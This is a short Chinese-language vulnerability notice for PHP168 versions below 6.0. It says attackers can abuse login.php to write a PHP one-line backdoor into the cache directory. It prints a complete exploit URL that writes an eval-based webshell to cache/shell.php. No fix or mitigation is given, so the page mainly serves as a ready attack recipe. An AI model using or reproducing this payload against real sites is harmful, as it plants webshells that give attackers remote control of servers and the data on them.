危险等级:高
影响版本:PHP168 6.0以下版本
入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。
出问题的文件
login.php
login.php?makehtml=1&chdb[htmlname]=shell.php&chdb[path]=cache&content=<?php%20@eval($_POST[a]);?>
写到:cache/shell.php
如对本文有疑问,请提交到交流论坛,广大热心网友会为你解答!! 点击进入论坛